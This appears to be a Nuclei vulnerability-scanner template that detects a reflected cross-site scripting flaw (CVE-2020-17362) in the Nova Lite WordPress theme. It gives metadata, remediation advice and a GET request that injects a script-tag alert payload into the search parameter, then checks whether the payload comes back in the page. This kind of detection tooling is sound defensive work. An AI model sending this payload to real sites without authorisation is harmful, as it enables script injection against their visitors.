57 lines
1.9 KiB
YAML
57 lines
1.9 KiB
YAML
id: CVE-2020-17362
|
|
|
|
info:
|
|
name: Nova Lite < 1.3.9 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Upgrade to Nova Lite version 1.3.9 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-17362
|
|
- https://themes.trac.wordpress.org/browser/nova-lite/1.3.9/readme.txt?rev=134076
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-17362
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00101
|
|
epss-percentile: 0.412
|
|
cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: themeinprogress
|
|
product: nova_lite
|
|
framework: wordpress
|
|
tags: cve2020,cve,wordpress,xss,wp-plugin,wpscan,unauth,themeinprogress
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "nova-lite"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100ab34023f96ff9b73ad9b41e60f530d15a806426ebaf266dfa573af429f707066022027a8e1e0e951dbd0be795667ca7497abc9000048460f06fbe56fd555a9416315:922c64590222798bb761d5b6d8e72950 |